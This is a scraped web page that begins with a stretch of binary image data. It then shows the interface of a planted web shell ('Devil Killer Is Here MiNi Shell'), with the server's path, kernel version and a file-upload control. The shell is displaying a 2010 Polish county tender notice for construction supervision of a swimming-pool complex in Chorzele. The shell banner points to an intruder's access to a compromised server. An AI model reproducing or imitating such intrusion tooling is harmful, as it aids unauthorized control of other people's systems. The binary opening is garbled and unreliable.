JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101126/384694-N-2010.html

<p class="kh_header"><b>Przasnysz: Pełnienie funkcji inspektora nadzoru inwestorskiego nad inwestycją realizowaną w ramach Projektu - Mazowieckie Centrum Sportów Zimowych - Kompleks Chorzele - etap I</b><br>
<b>Numer ogłoszenia: 384694 - 2010; data zamieszczenia: 26.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe , ul. Św. Stanisława Kostki 5, 06-300 Przasnysz, woj. mazowieckie, tel. 029 7522270 w.121, faks 029 7522270.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.powiat-przasnyski.pl/</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru inwestorskiego nad inwestycją realizowaną w ramach Projektu - Mazowieckie Centrum Sportów Zimowych - Kompleks Chorzele - etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zakres zamówienia 
Wykonawca  będzie pełnił funkcję Inspektora nadzoru inwestorskiego określoną w art. 25 Prawa budowlanego łącznie z funkcją Koordynatora czynności inspektorów nadzoru inwestorskiego określoną w art. 27  Prawa budowlanego (Dz. U. z 2006 r. Nr 156 poz. 1118 z późn. zm.) w okresie realizacji robót budowlanych.  
Dla celów niniejszej dokumentacji Zamawiający wprowadza następujące określenia:
Zamawiający - Powiat Przasnyski, ul. Św. St. Kostki 5, 06-300 Przasnysz
Inżynier - Wykonawca wybrany na podstawie niniejszego przetargu do pełnienia funkcji Inspektora nadzoru inwestorskiego określoną w art. 25 Prawa budowlanego łącznie z funkcją Koordynatora czynności inspektorów nadzoru inwestorskiego określoną w art. 27  Prawa budowlanego (Dz. U. z 2006 r. Nr 156 poz. 1118 z późn. zm.)
Wykonawca Robót Budowlanych - wykonawca wybrany na podstawie ustawy Prawo zamówień publicznych do realizacji inwestycji pn. Roboty budowlane i wyposażenie zadania inwestycyjnego pn. Mazowieckie Centrum Sportów Zimowych - Kompleks Chorzele - etap I.

2.	Przedmiot i zakres rzeczowy robót budowlanych  podlegających nadzorowi Inżyniera:

Przedmiotem zamówienia jest pełnienie funkcji inspektora nadzoru dla budowy w Chorzelach wielofunkcyjnego kompleksu obiektów tworzących Mazowieckie Centrum Sportów Zimowych. Planowana inwestycja zlokalizowana będzie przy Zespole Szkół Ponadgimnazjalnych na działce nr 1080/3 i 1080/4  przy ulicy Szkolnej i przy ulicy Grunwaldzkiej w Chorzelach. W aspekcie technicznym i funkcjonalno-użytkowym projekt obejmuje budowę wielofunkcyjnego obiektu sportowo-rekreacyjnego, w skład którego wchodzą: kryta pływalnia, basen sportowy z zapleczem socjalno-szatniowym.
Produktami przedmiotowego projektu będzie wybudowana pływalnia stanowiąca część Mazowieckiego Centrum Sportów Zimowych - Kompleks Chorzele, służąca jako dodatkowa baza dla powiatowych jednostek oświatowych.
Projektowany zespół wg projektów zatwierdzonych składa się z następujących części funkcjonalnych: 
	Basen kąpielowy - o wymiarze lustra wody 12,5 x 25 m oraz zróżnicowanej głębokości od 1,20 do 1,80 m. Posiada własne zaplecze sanitarno - szatniowe, dostępne z zewnątrz, oraz dla uczniów - od strony istniejącej szkoły (poprzez projektowaną przewiązkę). W pobliżu basenu znajdują się pomieszczenia technologii uzdatniania wody basenowej.
	Zespół wejściowy basenu kąpielowego - dostępny od strony ul. Szkolnej. W hallu wejściowym znajduje się kasa biletowa. Połączony jest z hallem rekreacyjnym spełniającym rolę poczekalni.
	Przewiązka - przeznaczona dla uczniów, łącząca budynek istniejącej szkoły 
z obiektami pływalni.
	Basen sportowy (rekreacyjny) z zapleczem - przylega bezpośrednio do hali basenu kąpielowego od strony zachodniej. Dostępny od strony istniejącej szkoły (od strony południowej), a także posiada niezależne wejście od strony zachodniej. W hali basenu zaprojektowano: basen do nauki pływania dla dzieci szkoły podstawowej o głębokości 1,05 m (z atrakcjami: hydromasaż, gejzery, fontanna), wanna z hydromasażem, zjeżdżalnia rynnowa do wody, basen hamowny zjeżdżalni - nieregularny.
	Zaplecze socjalno-szatniowe - przylega bezpośrednio do hali basenu. Składa się ono z dwóch zespołów umywalni z szatniami oraz z pomieszczenia ratownika, posiadającego bezpośrednie wejście i wgląd na halę basenu.
	Zespół wejściowy basenu sportowego - dostępny z zewnątrz od strony zachodniej.
Projekt w swym zakresie obejmuje również adaptację budynku istniejącej starej sali gimnastycznej. Adaptacja budynku polega na:
1)	przystosowaniu na funkcję auli dla zespołu szkół: zmiana okładzin wewnętrznych, częściowe zamurowanie istniejących okien, częściowe wyburzenia otworów drzwiowych w celu otwarcia auli w stronę basenu kąpielowego oraz hallu wejściowego,
2)	wytworzenie zaplecza magazynowego (dostępnego bezpośrednio z pomieszczenia auli) oraz zaplecza sanitarnego (dostępnego z pomieszczenia hallu wejściowego),
3)	przebudowa dachu auli: projekt przewiduje dach czterospadowy o kącie nachylenia połaci 27%. Na projektowanym dachu zamontowane będą kolektory słoneczne.
	
Zakres zamówienia obejmuje: wykonanie robót budowlanych, dostawę urządzeń, rozruch, sporządzenie dokumentacji powykonawczej, usługi gwarancyjne, przeszkolenie obsługi 
i oznakowanie urządzeń zgodnie z obowiązującymi przepisami prawa (w szczególności Prawa budowlanego) oraz wymogami instytucji dotującej. 
Wszystkie roboty będą wykonane z materiałów dostarczonych przez Wykonawcę.

3.	Szczegółowy opis robót budowlanych jest zawarty w wymienionych poniżej dokumentach, które będą uważane, odczytywane i interpretowane według następującego pierwszeństwa:

1)	Dokumentacja projektowa, na którą składa się:
a.	Projekt budowlany
b.	Projekty wykonawcze
2)	Specyfikacje techniczne wykonania i odbioru robót

Dokumenty te są załącznikiem do SIWZ na roboty budowlane w postępowaniu pn. Roboty budowlane i wyposażenie zadania inwestycyjnego pn. Mazowieckie Centrum Sportów Zimowych - Kompleks Chorzele - etap I i są dostępne na stronie internetowej Zamawiającego: http://www.bip.powiat-przasnysz.pl 

4.	Uwarunkowania prowadzenia robót podlegających nadzorowi Inżyniera:

1)	Wykonawca w ramach zamówienia zrealizuje cały zakres objęty dokumentacją projektową, zgodnie z wymaganiami zawartymi w Specyfikacjach technicznych wykonania i odbioru robót (w dalszej części dokumentu zwanych Specyfikacjami technicznymi). 
2)	Roboty realizowane będą zgodnie z warunkami określonymi w Umowie oraz w Specyfikacjach technicznych, stanowiących integralną część Umowy.
3)	Jeżeli gdziekolwiek w dokumentacji projektowej oraz Specyfikacjach technicznych użyto nazw producentów urządzeń i materiałów przewidzianych do zastosowania przy realizacji Zamówienia Zamawiający dopuszcza zastosowania równoważnych (tzn. o parametrach nie gorszych niż wskazanych) urządzeń innych producentów. Minimalne parametry jakościowe oraz techniczne urządzeń zawarto w dokumentacji projektowej i w specyfikacjach technicznych.

5.	Zakres prac Inżyniera.

a)	pełnienie profesjonalnego, kompletnego nadzoru inwestorskiego nad prowadzonymi robotami poprzez personel w liczbie pracowników niezbędnych do sprawnego i płynnego realizowania Umowy oraz koordynacji poszczególnych robót budowlanych,
b)	zapoznanie się z posiadaną przez Zamawiającego dokumentacją projektową i specyfikacjami technicznymi wykonania i odbioru robót dotyczącymi przedmiotowego Zadania, pozwoleniami i uzgodnieniami oraz zweryfikowania dokumentacji pod względem zgodności rozwiązań z obowiązującymi przepisami prawa i zasadami współczesnej wiedzy technicznej oraz przedstawienie na piśmie ewentualnych uwag i propozycji zmian,
c)	zapoznanie się z obowiązującym stanem prawnym dotyczącym prawa krajowego i wspólnotowego w zakresie zawierającym unormowania dotyczące Europejskiego Funduszu Rozwoju Regionalnego oraz umową o dofinansowanie.
d)	wydawanie wykonawcy robót, kierownikowi budowy i/lub kierownikom robót poleceń potwierdzonych wpisem w dzienniku budowy, dotyczących usunięcia nieprawidłowości lub zagrożeń , wykonania prób lub badań, oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych i dowodów dopuszczenia do stosowania w budownictwie wyrobów budowlanych oraz urządzeń technicznych
e)	reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z dokumentacją projektową, pozwoleniem na budowę, przepisami prawa, zasadami wiedzy technicznej oraz wymaganiami umowy na roboty budowlane,
f)	koordynowanie prac realizowanych przez wykonawcę oraz monitorowanie realizacji pod względem technicznym, finansowym i organizacyjnym oraz zgodności z harmonogramem rzeczowo-finansowym,
g)	przeprowadzanie regularnych inspekcji placu budowy, sprawdzających jakość wykonywanych robót, przestrzeganie przepisów dot. bezpieczeństwa, zgodności postępowania z umową na wykonanie robót oraz sporządzanie pisemnych raportów dla Zamawiającego,
h)	zatwierdzanie materiałów budowlanych i instalacyjnych oraz urządzeń jakie mają być wbudowane zgodnie z dokumentacją projektową; sprawdzanie jakości i prawidłowości dokumentów, zezwoleń, aprobat technicznych, deklaracji zgodności itd. w celu uniknięcia użycia materiałów wadliwych lub nie mających polskich certyfikatów,
i)	nadzór nad Wykonawcą robót budowlanych w zakresie przestrzegania i stosowania przepisów prawa polskiego, a w szczególności przepisów Prawa budowlanego, Prawa ochrony środowiska, Ustawy o odpadach oraz przepisów Bezpieczeństwa i Higieny Pracy i ochrony ppoż,
j)	sprawdzanie i zatwierdzanie harmonogramów rzeczowo-finansowych sporządzonych przez wykonawców robót,
k)	ścisła współpraca z  osobami pełniącymi nadzór autorski, geologiczny oraz innymi instytucjami, których udział w realizacji Zadania okaże się niezbędny,
l)	żądanie od wykonawcy robót, kierownika budowy i/lub kierowników robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót, a także wstrzymania dalszych robót budowlanych w przypadku, gdy ich kontynuacja mogłaby wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z dokumentacją projektową i/lub pozwoleniem na budowę,
m)	monitorowanie postępu prac, włącznie ze składaniem z nich raportów, w których będą ujęte wskaźniki rzeczowo-finansowe w zakresie wymaganym przez Instytucję dotującą oraz wystawianie wniosków o płatność,
n)	szacowanie, weryfikacja i ewidencja ewentualnych robót zamiennych,  a także nadzór nad ich realizacją,
o)	udział w przygotowaniu i ocena niezbędnych opinii, ekspertyz i dokumentacji na roboty, tymczasowe,
p)	weryfikacja i analiza rysunków wykonawczych sporządzanych przez wykonawców robót oraz  sporządzenie opinii dla Zamawiającego,
q)	uczestniczenie w cyklicznych naradach koordynacyjnych organizowanych przez wykonawcę robót, z udziałem Zamawiającego (na placu budowy co najmniej raz w miesiącu, a jeśli zajdzie potrzeba lub na życzenie Zamawiającego w innym cyklu). Narady będą protokołowanie przez Wykonawcę,
r)	informowanie Zamawiającego o wszystkich problemach zaistniałych i mogących zaistnieć, razem ze sposobami ich rozwiązania oraz uzgodnienie z Zamawiającym wszelkich zmian dotyczących organizacji robót i materiałów,
s)	sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych i przewodów kominowych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywanie ich do użytkowania,
t)	prowadzenie polubownych uzgodnień w przypadku zaistnienia sporu pomiędzy Zamawiającym a wykonawcą robót,
u)	kontrola prawidłowości  prac pomiarowych, 
v)	egzekwowanie opracowania przez wykonawcę robót instrukcji eksploatacji i konserwacji urządzeń oraz dostarczenie jej w uzgodnionej ilości egz. do Zamawiającego,
w)	prowadzenie dokumentacji budowy wraz z dokumentacją fotograficzną budowy,
x)	przegląd, ocena kompletności oraz zgodności dokumentacji powykonawczej ze stanem istniejącym i dostarczenie jej do Zamawiającego w uzgodnionej formie i ilości,
y)	organizowanie, nadzorowanie i koordynowanie dodatkowych testów jakości przez specjalistyczne instytucje, jeżeli będzie to niezbędne,
z)	rozliczenie rzeczowe i finansowe robót budowlanych,
aa)	sporządzenie wzorów raportów z prac wykonawcy robót w oparciu o wytyczne Instytucji dotującej,
bb)	obliczanie wysokości kar umownych z tytułu niewykonania lub nienależytego wykonania umowy na roboty,
cc)	stwierdzenie kompletności i prawidłowości dokumentów odbiorowych złożonych przez Wykonawcę robót,
dd)	skompletowanie niezbędnych dokumentów i przygotowanie wniosku o udzielenie pozwolenia na użytkowanie,
ee)	prowadzenie, przechowywanie i archiwizowanie korespondencji i wszelkich dokumentów ze szczególnym uwzględnieniem wpisów do dziennika budowy, ostrzeżeń, uwag i wniosków, które mogą być dowodami w razie ewentualnych sporów, roszczeń wykonawców, katastrof budowlanych, itp.,
ff)	sporządzenie protokołów przekazania/przyjęcia środków trwałych OT zgodnie z wytycznymi Zamawiającego i przekazanie ich Zamawiającemu w ciągu 1 miesiąca od daty wydania Protokołu odbioru robót,
gg)	wszystkie inne czynności i zadania nie wymienione, które okażą się konieczne do prawidłowej realizacji umów na roboty budowlane, wykonania planowanych efektów zadania oraz zabezpieczenie interesów Zamawiającego, 
hh)	wykonywanie swoich obowiązków w ścisłej współpracy z Zamawiającym, zgodnie z jego poleceniami, obowiązującymi przepisami oraz regulacjami stosowanymi dla projektów współfinansowanych przez Unię Europejską w ramach Europejskiego Funduszu Rozwoju Regionalnego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.30.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 4.000,00 PLN ( słownie: cztery tysiące złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał co najmniej trzy usługi polegające na pełnieniu funkcji inspektora nadzoru, w tym minimum:
		- co najmniej jedna usługa dotyczyła pełnienia funkcji inspektora nadzoru inwestycji dotyczącej budowy obiektu sportowego o wartości projektu min. 8.000.000,00 PLN netto, 

	-	co najmniej jedna usługa dotyczyła pełnienia funkcji inspektora nadzoru 
 	inwestycji dotyczącej budowy basenu kąpielowego.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	Wykonawca musi dysponować następującymi osobami: 
-	Inspektor nadzoru w specjalności konstrukcyjno-budowlanej posiadający:
a)	wykształcenie wyższe techniczne;
b)	uprawnienia do wykonywania samodzielnych funkcji technicznych                    w budownictwie w zakresie kierowania robotami budowlanymi                           w specjalności budowlano-konstrukcyjnej bez ograniczeń,
c)	min. 3-letnie doświadczenie zawodowe na stanowisku inspektora nadzoru w branży konstrukcyjno - budowlanej,  
d)	udział  przy realizacji co najmniej 2 zadań inwestycyjnych o wartości robót budowlanych co najmniej 4 milionów zł brutto każda.
-	Inspektor nadzoru w specjalności sanitarnej  posiadający:
a)	wykształcenie wyższe techniczne;
b)	uprawnienia do wykonywania samodzielnych funkcji technicznych                     w budownictwie w zakresie kierowania robotami budowlanymi                         w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, 
c)	min. 3-letnie doświadczenie zawodowe na stanowisku inspektora nadzoru w branży sanitarnej,  
d)	udział  przy realizacji co najmniej 2 zadań inwestycyjnych o wartości robót budowlanych co najmniej 4 milionów zł brutto każda.
-	Inspektor nadzoru w specjalności elektrycznej  posiadający:
a)	wykształcenie wyższe techniczne;
b)	uprawnienia do wykonywania samodzielnych funkcji technicznych                            w budownictwie w zakresie kierowania robotami budowlanymi                            w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń.
c)	min. 2-letnie doświadczenie zawodowe na stanowisku inspektora nadzoru w branży elektrycznej 

Zamawiający nie dopuszcza objęcia więcej niż jednej ww. funkcji przez jedną osobę.

Uwaga ! 
Zamawiający określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego  oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (tekst jedn. Dz. U. z 2006 r., Nr 156, poz. 1118 ze zm.)
Wskazane w pkt. 9.1.2) osoby powinny biegle posługiwać się językiem polskim. W przypadku, gdy wskazane osoby nie wykazują się biegłą znajomością języka polskiego Wykonawca jest zobowiązany zapewnić co najmniej jednego tłumacza na okres realizacji umowy, w celu realizacji potrzeb wynikających z wykonywanego zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczególnych warunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
